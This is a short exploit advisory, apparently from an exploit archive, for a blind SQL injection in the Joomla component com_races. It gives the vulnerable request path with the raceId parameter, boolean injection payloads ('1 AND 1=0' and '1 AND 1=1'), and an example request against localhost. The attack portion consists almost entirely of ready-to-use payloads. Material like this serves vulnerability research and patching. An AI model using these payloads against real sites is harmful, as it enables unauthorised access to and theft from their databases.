id: 9649
date: 03/13/2010
title: Joomla Component com_races Blind SQL Injection Vulnerability
author: DevilZ TM
cves: 

============================================================
Joomla Component com_races Blind SQL Injection Vulnerability
============================================================

[~]#########################################   ExploiT   #############################################[~]
  
[~] Vulnerable File :
  
http://127.0.0.1/index.php?option=com_races&task=rview&raceId=[Blind SQL]
  
[~] ExploiT         :
  
1+AND+1=0 , 1+AND+1=1
  
[~] Example         :
  
http://127.0.0.1/index.php?option=com_races&task=rview&raceId=1+AND+1=1



#  0day.today [2023-03-25]  #